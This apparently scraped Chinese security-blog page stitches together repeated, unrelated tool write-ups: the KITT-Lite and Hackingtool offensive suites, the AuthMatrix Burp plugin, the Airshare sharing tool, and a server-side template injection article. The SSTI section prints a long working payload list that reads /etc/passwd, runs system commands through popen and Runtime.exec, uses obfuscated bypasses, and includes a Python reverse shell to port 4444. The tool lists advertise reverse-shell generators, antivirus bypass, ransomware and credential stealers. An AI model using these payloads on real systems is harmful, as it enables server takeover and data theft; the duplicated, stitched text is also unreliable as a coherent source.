KITT渗透测试框架-轻量级版本

KITT渗透测试框架是一款基于Python实现的轻量级命令行渗透测试工具集,本质上上来说,它就是一个针对渗透测试人员设计的开源解决方案。在KITT的帮助下,广大研究人员能够以编程的方式将他们所需要的工具编译进其他的开源项目之中。除此之外,KITT还可以帮助用户轻松访问大量专业的渗透测试工具,并且支持源码级别的自定义配置。

目前,KITT已支持Kali Linux v2020.2版本。KITT-Lite是KITT工具的命令行接口版本,如果你想要使用带有图形化用户接口的KITT版本,可以点击【这里】获取。

功能介绍

开源网络情报OSINT

密码破解

网络钓鱼

Payload

  • Evil-Droid- Android APK Payload嵌入框架
  • Catchyou- 无法检测的Win32 Payload生成器
  • Winspy- Windows反向Shell生成器
  • Evilreg- Windows .reg反向Shell生成器
  • Badlnk- 快捷方式(.lnk) 反向Shell生成器
  • Enigma- 多平台Payload Dropper
  • Avet_Fabric- Windows AV绕过Payload
  • Eviloffice-Excel & Word 文档宏/DDE代码注入工具
  • Evilpdf- PDF文件.exe注入工具
  • EvilDLL- DLL反向Shell生成器r
  • DroidTracker- Android .APK定位追踪工具
  • hmmcookies- 获取Firefox, Chrome和Opera Cookies

键盘记录

权限提升/漏洞利用

  • sh – 自定义Ubuntu USB boot漏洞利用
  • LinEnum- Linux shell枚举工具
  • Linux – Linux 漏洞利用和枚举脚本
  • Mimikatz_trunk- Windows后渗透工具
  • mysql – MSQL漏洞利用和枚举脚本
  • sh – 后渗透阶段自定义密码/ 后门
  • pspy- Linux进程扫描工具
  • windows-privesc-check- Windows提权脚本
  • Windows-Privlege-Escalation – Windows提权脚本
  • Chromepass- Chrome登录凭证提取工具
  • htbenum- 离线本地枚举服务器 (HTB)
  • firefox_decrypt- Mozilla 浏览器登录凭证提取工具
  • Powershell-reverse-tcp- 反向TCP Powershell Payload生成/混淆工具
  • Invoker- Shell实用工具
  • HiveJack- Windows SAM导出工具
  • Impacket- Python网络协议工具
  • Win-Brute-Logon- Windows登录密码爆破工具
  • Covermyass- UNIX系统痕迹清理工具
  • Leviathan- 系统审计工具套件
  • ispy- EternalBlue/Bluekeep扫描/漏洞利用工具
  • NekoBotV1- 自动化漏洞利用工具
  • Gtfo- Unix 代码搜索工具
  • Grok-backdoor- 带有Ngrok信道的基于Python的后门
  • Mimikatz- Windows密码、哈希、PIN提取工具

勒索软件

  • Hidden-cry- Windows AES 256 位加密/解密工具
  • CryDroid- Android 加密/解密工具

Bot

网络破解

  • Airsuite-ng – 数据包嗅探,WEP、WPA/WPA2-PSK破解和分析工具
  • Wash & Reaver – WPS 破解工具
  • Wifite2- 网络审计工具
  • Ettercap – 中间人攻击套件
  • Airgeddon- 网络审计工具
  • WiFipumpkin3- 网络破解框架
  • Wifijammer- 基站/移动WiFi干扰
  • PwnSTAR- 钓鱼AP框架
  • HT-WPS- WPS 密码提取工具
  • Linset- WPA/WPA2中间人攻击工具l
  • PentBox- 蜜罐部署工具
  • Espionage- 数据包嗅探/ARP欺骗
  • EvilNet- ARP 攻击, VLAN 攻击, MAC Flooding执行工具

物联网漏洞利用

  • HomePwn- 物联网漏洞利用框架
  • Spooftooph – 蓝牙嗅探工具
  • BtVerifier – Rfcomm信道验证工具
  • BlueScan – 蓝牙端口/地址扫描器r
  • Dronesploit- 无人机漏洞利用框架

硬件攻击

  • MouseJack- 键盘和鼠标劫持工具
  • GPIO_CTL – 针对RPi的自定义GPIO控制器
  • Brutal- RubberDucky Payload 生成器

系统安装

  • SysIntegrity- 文件完整性和日志系统检测
  • snort- 网络入侵检测系统
  • ssh_port_randomizer – SSHD 端口随机化工具
  • ssh rsa_key generator – RSA 密钥生成工具
  • proxy router -流量代理路由器
  • Fail2ban Configurations – Fail2ban协议审核工具
  • PTF- 渗透测试工具安装框架
  • ClamAV- 病毒/恶意软件命令行扫描工具
  • Wotop- HTTP网络流量信道工具
  • TorghostNG- Tor代理

工具使用

注意:工具的安装过程大概需要20分钟的时间,具体情况需视网络状况而定。

首先,我们需要使用下列命令将该项目源码克隆至本地:

git clone https://github.com/Cisc0-gif/KITT-Lite.git

接下来,使用下列命令完成工具以及所有依赖库的安装,并配置PATH环境变量:

sudo ./setup.sh

如果你只想要安装工具本身的话,可以直接运行下列命令:

sudo ./catchup.sh

工具使用

如需使用该框架,直接在命令行终端窗口中执行下列命令即可:

kittlite

许可证协议

本项目的开发与发布遵循GNU开源许可证协议。

项目地址

KITT:【GitHub传送门

 

 

KITT渗透测试框架-轻量级版本

KITT渗透测试框架是一款基于Python实现的轻量级命令行渗透测试工具集,本质上上来说,它就是一个针对渗透测试人员设计的开源解决方案。在KITT的帮助下,广大研究人员能够以编程的方式将他们所需要的工具编译进其他的开源项目之中。除此之外,KITT还可以帮助用户轻松访问大量专业的渗透测试工具,并且支持源码级别的自定义配置。

目前,KITT已支持Kali Linux v2020.2版本。KITT-Lite是KITT工具的命令行接口版本,如果你想要使用带有图形化用户接口的KITT版本,可以点击【这里】获取。

功能介绍

开源网络情报OSINT

密码破解

网络钓鱼

Payload

  • Evil-Droid- Android APK Payload嵌入框架
  • Catchyou- 无法检测的Win32 Payload生成器
  • Winspy- Windows反向Shell生成器
  • Evilreg- Windows .reg反向Shell生成器
  • Badlnk- 快捷方式(.lnk) 反向Shell生成器
  • Enigma- 多平台Payload Dropper
  • Avet_Fabric- Windows AV绕过Payload
  • Eviloffice-Excel & Word 文档宏/DDE代码注入工具
  • Evilpdf- PDF文件.exe注入工具
  • EvilDLL- DLL反向Shell生成器r
  • DroidTracker- Android .APK定位追踪工具
  • hmmcookies- 获取Firefox, Chrome和Opera Cookies

键盘记录

权限提升/漏洞利用

  • sh – 自定义Ubuntu USB boot漏洞利用
  • LinEnum- Linux shell枚举工具
  • Linux – Linux 漏洞利用和枚举脚本
  • Mimikatz_trunk- Windows后渗透工具
  • mysql – MSQL漏洞利用和枚举脚本
  • sh – 后渗透阶段自定义密码/ 后门
  • pspy- Linux进程扫描工具
  • windows-privesc-check- Windows提权脚本
  • Windows-Privlege-Escalation – Windows提权脚本
  • Chromepass- Chrome登录凭证提取工具
  • htbenum- 离线本地枚举服务器 (HTB)
  • firefox_decrypt- Mozilla 浏览器登录凭证提取工具
  • Powershell-reverse-tcp- 反向TCP Powershell Payload生成/混淆工具
  • Invoker- Shell实用工具
  • HiveJack- Windows SAM导出工具
  • Impacket- Python网络协议工具
  • Win-Brute-Logon- Windows登录密码爆破工具
  • Covermyass- UNIX系统痕迹清理工具
  • Leviathan- 系统审计工具套件
  • ispy- EternalBlue/Bluekeep扫描/漏洞利用工具
  • NekoBotV1- 自动化漏洞利用工具
  • Gtfo- Unix 代码搜索工具
  • Grok-backdoor- 带有Ngrok信道的基于Python的后门
  • Mimikatz- Windows密码、哈希、PIN提取工具

勒索软件

  • Hidden-cry- Windows AES 256 位加密/解密工具
  • CryDroid- Android 加密/解密工具

Bot

网络破解

  • Airsuite-ng – 数据包嗅探,WEP、WPA/WPA2-PSK破解和分析工具
  • Wash & Reaver – WPS 破解工具
  • Wifite2- 网络审计工具
  • Ettercap – 中间人攻击套件
  • Airgeddon- 网络审计工具
  • WiFipumpkin3- 网络破解框架
  • Wifijammer- 基站/移动WiFi干扰
  • PwnSTAR- 钓鱼AP框架
  • HT-WPS- WPS 密码提取工具
  • Linset- WPA/WPA2中间人攻击工具l
  • PentBox- 蜜罐部署工具
  • Espionage- 数据包嗅探/ARP欺骗
  • EvilNet- ARP 攻击, VLAN 攻击, MAC Flooding执行工具

物联网漏洞利用

  • HomePwn- 物联网漏洞利用框架
  • Spooftooph – 蓝牙嗅探工具
  • BtVerifier – Rfcomm信道验证工具
  • BlueScan – 蓝牙端口/地址扫描器r
  • Dronesploit- 无人机漏洞利用框架

硬件攻击

  • MouseJack- 键盘和鼠标劫持工具
  • GPIO_CTL – 针对RPi的自定义GPIO控制器
  • Brutal- RubberDucky Payload 生成器

系统安装

  • SysIntegrity- 文件完整性和日志系统检测
  • snort- 网络入侵检测系统
  • ssh_port_randomizer – SSHD 端口随机化工具
  • ssh rsa_key generator – RSA 密钥生成工具
  • proxy router -流量代理路由器
  • Fail2ban Configurations – Fail2ban协议审核工具
  • PTF- 渗透测试工具安装框架
  • ClamAV- 病毒/恶意软件命令行扫描工具
  • Wotop- HTTP网络流量信道工具
  • TorghostNG- Tor代理

工具使用

注意:工具的安装过程大概需要20分钟的时间,具体情况需视网络状况而定。

首先,我们需要使用下列命令将该项目源码克隆至本地:

git clone https://github.com/Cisc0-gif/KITT-Lite.git

接下来,使用下列命令完成工具以及所有依赖库的安装,并配置PATH环境变量:

sudo ./setup.sh

如果你只想要安装工具本身的话,可以直接运行下列命令:

sudo ./catchup.sh

工具使用

如需使用该框架,直接在命令行终端窗口中执行下列命令即可:

kittlite

许可证协议

本项目的开发与发布遵循GNU开源许可证协议。

项目地址

KITT:【GitHub传送门

 

AuthMatrix

AuthMatrix是一款针对Burp Suite工具的插件,该工具可以帮助广大研究人员对Web应用程序以及Web服务的认证机制进行安全测试。在AuthMatrix的帮助下,测试人员可以将注意力放在特定应用的用户表、权限、角色和请求上面了,而这些数据库表和网络请求的结构也可以直接映射到各种威胁建模方法中常见的访问控制矩阵。

工具安装配置完成之后,测试人员就可以直接通过鼠标点击就可以启动测试任务了。工具将以带有色彩高亮的界面显示测试的输出结果,并标注目标系统中存在的认证授权漏洞。

工具安装

AuthMatrix可以直接通过Burp Suite BApp Store来进行安装。在Burp Suite中,选择Extender标签页,然后选择BApp Store,选择AuthMatrix,然后点击安装即可。

如果研究人员想要进行手动安装的话,可以直接使用下列命令将该项目源码克隆至本地:

接下来,打开Burp Suite,选择Extender标签页,点击“Add”按钮,将扩展类型更改为Python,然后选择AuthMatrix Python文件即可:

git clone https://github.com/SecurityInnovation/AuthMatrix.git

注意事项

AuthMatrix的正常运行需要配置Burp Suite去使用Jython,具体配置方法请参考这篇【文档】。确保使用的Jython版本大于或等于v2.7.0,以保证工具的兼容性。

工具使用

  • 在目标应用程序中创建拥有各种权限角色的用户账号,一般是User、Admin或Anonymous匿名帐户。
  • 创建足够数量的用户来对应应用程序内的各种角色权限,然后通过勾选框来给用户进行分组。“单个用户”角色只包含一个用户,你也可以删除组内用户。
  • 在Repeater标签页中为每一个用户生成会话令牌,并在Users表的相应列中填写令牌。Cookie可以直接通过右键点击Repeater界面中的用户来进行发送。AuthMatrix可以对Cookie中的字符串数据进行智能解析,并填充至请求中。这里的Cookie域是可选项,如果目标使用的是HTTP Header,这里也可以点击“New Header”按钮来进行Header添加。
  • 在Burp Suite的其他标签页中,也可以右键点击来选择“发送给AuthMatrix”。
  • 在AuthMatrix的请求表中,可以通过勾选框来选择需要发送HTTP请求的认证选项。
  • 根据请求的响应行为来自定义响应正则式,并判断是否认证成功。常见的正则式包含HTTP相应Header,成功信息以及其他变量将包含在body中。
  • 点击工具下方的“Run”按钮,便可以直接批量发送请求,然后通过工具接口观察测试结果。绿色内容表示无漏洞,红色表示请求中可能存在漏洞,蓝色表示结果可能存在假阳性。

工具演示截图

AuthMatrix样本配置

假阳性检测(无效的会话令牌)

CSRF检测

跨用户资源测试

用户认证

Failure Regex模式配置样本

项目地址

AuthMatrix:【GitHub传送门

 

 

 

服务器端模板注入

所谓服务器端模板注入技术,指的是攻击者能够使用本机模板语法将Payload注入到一个模板之中,然后再在服务器端执行。服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点,除此之外SSTI 攻击还可以用来找出 Web 应用程序的内容结构。

根据技术设计实现,模板引擎能够结合固定模板和动态数据来生成特定的网页。如果用户的输入数据直接与模板内容相连接,而不是作为数据参数直接传入的话,就有可能发生服务器端模板注入攻击了。此时,攻击者将能够通过注入任意模板指令来对模板引擎进行恶意操作,一般来说,这将导致攻击者获取到目标网络服务器的完整控制权。也就是说,服务器端模板注入Payload需要在目标服务器上进行部署和使用,这将使它们比一般的客户端模板注入漏洞更加严重。

漏洞影响

服务器端模板注入漏洞会使网站面临各种攻击和安全风险,具体取决于所讨论的模板引擎以及应用程序如何使用它。在某些罕见的情况下,这些漏洞不会带来真正的安全风险。然而,大多数情况下,服务器端模板注入的影响可能是灾难性的。

如果在某些严重情况下,攻击者可以在目标服务器上实现远程代码执行,完全控制后端服务器,并使用它来对网络内部基础结构执行下一步攻击。

即使在不可能完全执行远程代码的情况下,攻击者通常仍可以使用服务器端模板注入作为许多其他攻击的跳板,从而可能获得对服务器上敏感数据和任意文件的读取访问权限。

Payload集

{{2*2}}[[3*3]]

{{3*3}}

{{3*'3'}}

<%= 3 * 3 %>

${6*6}

${{3*3}}

@(6+5)

#{3*3}

#{ 3 * 3 }

{{dump(app)}}

{{app.request.server.all|join(',')}}

{{config.items()}}

{{ [].class.base.subclasses() }}

{{''.class.mro()[1].subclasses()}}

{{ ''.__class__.__mro__[2].__subclasses__() }}

{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}

{{'a'.toUpperCase()}}

{{ request }}

{{self}}

<%= File.open('/etc/passwd').read %>

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}

${"freemarker.template.utility.Execute"?new()("id")}

{{app.request.query.filter(0,0,1024,{'options':'system'})}}

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}

{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}

{$smarty.version}

{php}echo `id`;{/php}

{{['id']|filter('system')}}

{{['cat\x20/etc/passwd']|filter('system')}}

{{['cat$IFS/etc/passwd']|filter('system')}}

{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}

{{request|attr(["_"*2,"class","_"*2]|join)}}

{{request|attr(["__","class","__"]|join)}}

{{request|attr("__class__")}}

{{request.__class__}}

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

${T(java.lang.System).getenv()}

${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

Payload下载

广大研究人员可以使用下列命令将现有Payload集克隆至本地(HTTPS):

[email protected]:~# git clone https://github.com/payloadbox/ssti-payloads.git

广大研究人员可以使用下列命令将现有Payload集克隆至本地(SSH):

[email protected]:~# git clone [email protected]:payloadbox/ssti-payloads.git

项目地址

SSTI-Payloads:【GitHub传送门

参考资料

 

Hackingtool是一款针对渗透测试人员的多合一测试套件,目前该套件可以给广大安全研究人员提供下列菜单内的工具:

-AnonSurf匿名保护工具

-信息收集工具

-密码攻击工具

-无线攻击工具

-SQL注入工具

-网络钓鱼攻击工具

-Web攻击工具

-后渗透工具

-信息取证工具

-Payload创建工具

-路由漏洞利用工具

-WiFi干扰工具

-XSS攻击工具

-逆向工程工具

-社交媒体查询工具

-DDoS攻击工具

-隐写工具

-IDN Homograph攻击工具

-哈希破解工具

-社交媒体攻击工具

-Android攻击工具

-RAT工具

-Web爬虫

-Payload注入工具

-系统更新工具

AnonSurf匿名保护工具

Anonmously Surf

Multitor

信息收集工具

Nmap

Dracnmap

Port Scanning

Host To IP

Xerosploit

Infoga - Email OSINT

ReconSpider

RED HAWK (All In One Scanning)

ReconDog

Striker

SecretFinder

Port Scanner

Breacher

密码攻击工具

Cupp

WordlistCreator

Goblin WordGenerator

Credential reuse attacks

Wordlist (Contain 1.4 Billion Pass)

无线攻击工具

WiFi-Pumpkin

pixiewps

Bluetooth Honeypot GUI Framework

Fluxion

Wifiphisher

Wifite

EvilTwin

SQL注入工具

sqlmap tool

NoSqlMap

Damn Small SQLi Scanner

Explo

Blisqy - Exploit Time-based blind-SQL injection

Leviathan - Wide Range Mass Audit Toolkit

SQLScan

社交媒体攻击工具

Instagram Attack

AllinOne SocialMedia Attack

Facebook Attack

Application Checker

Android攻击工具

Keydroid

MySMS

Lockphish (Grab target LOCK PIN)

DroidCam (Capture Image)

EvilApp (Hijack Session)

网络钓鱼攻击工具

Setoolkit

SocialFish

HiddenEye

Evilginx2

Shellphish

BlackEye

I-See-You(Get Location using phishing attack)

SayCheese (Grab target's Webcam Shots)

QR Code Jacking

Web攻击工具

SlowLoris

Skipfish

SubDomain Finder

CheckURL

Blazy

Sub-Domain TakeOver

后渗透工具

Vegile - Ghost In The Shell

Chrome Keylogger

信息取证工具

Bulk_extractor

Disk Clone and ISO Image Aquire

AutoSpy

Toolsley

Wireshark

Payload生成器

The FatRat*

Brutal

Stitch

MSFvenom Payload Creator

Venom Shellcode Generator

Spycam

Mob-Droid

漏洞利用框架

RouterSploit

WebSploit

Commix

Web2Attack

Fastssh

社交媒体查询工具

Find SocialMedia By Facial Recognation System

Find SocialMedia By UserName

Sherlock

SocialScan

信息隐藏工具

SteganoHide

StegnoCracker

Whitespace

DDoS攻击工具

SlowLoris

SYN Flood DDoS Weapon

UFOnet

GoldenEye

XSS攻击工具

DalFox(Finder of XSS)

XSS Payload Generator

Advanced XSS Detection Suite

Extended XSS Searcher and Finder

XSS-Freak

XSpear

XSSCon

XanXSS

IDN Homograph工具

EvilURL

电子邮件验证工具

KnockMail

哈希破解工具

Hash Buster

工具安装

演示视频:【油管地址

注意:该工具必须以ROOT权限运行!

工具的安装和使用命令如下:

git clone https://github.com/Z4nzu/hackingtool.git

chmod -R 755 hackingtool  

cd hackingtool

sudo pip3 install -r requirement.txt

bash install.sh

sudo hackingtool

按照上述命令输入并执行之后,我们也可以直接在终端窗口执行下列命令来运行Hackingtool:

[email protected]:~ hackingtool

工具运行截图

 

 

 

 

 

项目地址

Hackingtool:【GitHub传送门

项目情况

 

 

 

Airshare介绍

Airshare是一款针对本地网络的跨平台内容共享工具,该工具本质上是一个基于Python的命令行接口工具和模块,它基于aiohttp和zeroconf实现其功能。在Airshare的帮助下,我们可以在本地网络中,利用组播DNS实现两台设备的点对点数据传递/共享。除此之外,它还可以打开一个HTTP网站来与任何非命令行接口的外部接口进行交互。值得一提的是,该工具可以在完全离线的状态下运行。

功能介绍

当前版本的Airshare支持以下强大功能:

  • 在本地网络中快速传输内容。
  • 允许传输纯文本数据,支持从剪贴板发送或接收数据。
  • 支持多个文件、目录和大文件的传输,内容逐块发送,并且完全不涉及内存读写。
  • 支持直接发送剪贴板中路径所指向的文件。
  • 跨平台支持,支持在Linux、Windows和macOS上使用(通过命令行接口或Web接口),而且还支持移动端使用(通过Web接口)。
  • 使用多播DNS服务注册和发现,因此我们可以访问人类可读的代码内容。
  • 可以在其他Python程序中以模块的形式导入和使用。

工具安装

pip安装

$ pip install Airshare

pipx安装

$ pipx install Airshare

Homebrew安装

$ brew install airshare

工具使用

正如前文所述,Airshare支持发送和接收文件或目录。广大用户可以在命令行接口中使用下列命令来实现数据发送:

$ airshare noobmaster requirements.txt

并且在命令行接口中使用下列命令来实现数据接收:

$ airshare noobmaster

除此之外,我们也可以在浏览器中通过访问下列地址来下载共享的数据:

http://noobmaster.local:8000

当然了,我们还可以在任意Python项目中执行import命令来将Airshare以模块的形式导入并使用:

import airshare

已知问题

  • 针对非苹果设备的Link-local域名解析(.local地址)要求Avahi(Linux)或Bonjour(Windows)。
  • Android浏览器并没有内置组播DNS服务目录,无法解析.local地址。因此,工具新增了二维码支持,可以帮助我们轻松访问URL地址。
  • Windows用户要求配置Python环境,并且版本 < 3.8,使用Ctrl + Break组合键(或Ctrl + Fn + B)退出,而不是Ctrl + C。

工具演示样例

GIF:【点我获取

工具演示视频

油管地址:【点我观看

项目地址

Airshare:【GitHub传送门

许可证协议

Airshare项目的开发与发布遵循MIT开源许可证协议。

参考文档

 

AuthMatrix

AuthMatrix是一款针对Burp Suite工具的插件,该工具可以帮助广大研究人员对Web应用程序以及Web服务的认证机制进行安全测试。在AuthMatrix的帮助下,测试人员可以将注意力放在特定应用的用户表、权限、角色和请求上面了,而这些数据库表和网络请求的结构也可以直接映射到各种威胁建模方法中常见的访问控制矩阵。

工具安装配置完成之后,测试人员就可以直接通过鼠标点击就可以启动测试任务了。工具将以带有色彩高亮的界面显示测试的输出结果,并标注目标系统中存在的认证授权漏洞。

工具安装

AuthMatrix可以直接通过Burp Suite BApp Store来进行安装。在Burp Suite中,选择Extender标签页,然后选择BApp Store,选择AuthMatrix,然后点击安装即可。

如果研究人员想要进行手动安装的话,可以直接使用下列命令将该项目源码克隆至本地:

接下来,打开Burp Suite,选择Extender标签页,点击“Add”按钮,将扩展类型更改为Python,然后选择AuthMatrix Python文件即可:

git clone https://github.com/SecurityInnovation/AuthMatrix.git

注意事项

AuthMatrix的正常运行需要配置Burp Suite去使用Jython,具体配置方法请参考这篇【文档】。确保使用的Jython版本大于或等于v2.7.0,以保证工具的兼容性。

工具使用

  • 在目标应用程序中创建拥有各种权限角色的用户账号,一般是User、Admin或Anonymous匿名帐户。
  • 创建足够数量的用户来对应应用程序内的各种角色权限,然后通过勾选框来给用户进行分组。“单个用户”角色只包含一个用户,你也可以删除组内用户。
  • 在Repeater标签页中为每一个用户生成会话令牌,并在Users表的相应列中填写令牌。Cookie可以直接通过右键点击Repeater界面中的用户来进行发送。AuthMatrix可以对Cookie中的字符串数据进行智能解析,并填充至请求中。这里的Cookie域是可选项,如果目标使用的是HTTP Header,这里也可以点击“New Header”按钮来进行Header添加。
  • 在Burp Suite的其他标签页中,也可以右键点击来选择“发送给AuthMatrix”。
  • 在AuthMatrix的请求表中,可以通过勾选框来选择需要发送HTTP请求的认证选项。
  • 根据请求的响应行为来自定义响应正则式,并判断是否认证成功。常见的正则式包含HTTP相应Header,成功信息以及其他变量将包含在body中。
  • 点击工具下方的“Run”按钮,便可以直接批量发送请求,然后通过工具接口观察测试结果。绿色内容表示无漏洞,红色表示请求中可能存在漏洞,蓝色表示结果可能存在假阳性。

工具演示截图

AuthMatrix样本配置

假阳性检测(无效的会话令牌)

CSRF检测

跨用户资源测试

用户认证

Failure Regex模式配置样本

项目地址

AuthMatrix:【GitHub传送门

 

 

 

服务器端模板注入

所谓服务器端模板注入技术,指的是攻击者能够使用本机模板语法将Payload注入到一个模板之中,然后再在服务器端执行。服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点,除此之外SSTI 攻击还可以用来找出 Web 应用程序的内容结构。

根据技术设计实现,模板引擎能够结合固定模板和动态数据来生成特定的网页。如果用户的输入数据直接与模板内容相连接,而不是作为数据参数直接传入的话,就有可能发生服务器端模板注入攻击了。此时,攻击者将能够通过注入任意模板指令来对模板引擎进行恶意操作,一般来说,这将导致攻击者获取到目标网络服务器的完整控制权。也就是说,服务器端模板注入Payload需要在目标服务器上进行部署和使用,这将使它们比一般的客户端模板注入漏洞更加严重。

漏洞影响

服务器端模板注入漏洞会使网站面临各种攻击和安全风险,具体取决于所讨论的模板引擎以及应用程序如何使用它。在某些罕见的情况下,这些漏洞不会带来真正的安全风险。然而,大多数情况下,服务器端模板注入的影响可能是灾难性的。

如果在某些严重情况下,攻击者可以在目标服务器上实现远程代码执行,完全控制后端服务器,并使用它来对网络内部基础结构执行下一步攻击。

即使在不可能完全执行远程代码的情况下,攻击者通常仍可以使用服务器端模板注入作为许多其他攻击的跳板,从而可能获得对服务器上敏感数据和任意文件的读取访问权限。

Payload集

{{2*2}}[[3*3]]

{{3*3}}

{{3*'3'}}

<%= 3 * 3 %>

${6*6}

${{3*3}}

@(6+5)

#{3*3}

#{ 3 * 3 }

{{dump(app)}}

{{app.request.server.all|join(',')}}

{{config.items()}}

{{ [].class.base.subclasses() }}

{{''.class.mro()[1].subclasses()}}

{{ ''.__class__.__mro__[2].__subclasses__() }}

{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}

{{'a'.toUpperCase()}}

{{ request }}

{{self}}

<%= File.open('/etc/passwd').read %>

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}

${"freemarker.template.utility.Execute"?new()("id")}

{{app.request.query.filter(0,0,1024,{'options':'system'})}}

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}

{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}

{$smarty.version}

{php}echo `id`;{/php}

{{['id']|filter('system')}}

{{['cat\x20/etc/passwd']|filter('system')}}

{{['cat$IFS/etc/passwd']|filter('system')}}

{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}

{{request|attr(["_"*2,"class","_"*2]|join)}}

{{request|attr(["__","class","__"]|join)}}

{{request|attr("__class__")}}

{{request.__class__}}

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

${T(java.lang.System).getenv()}

${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}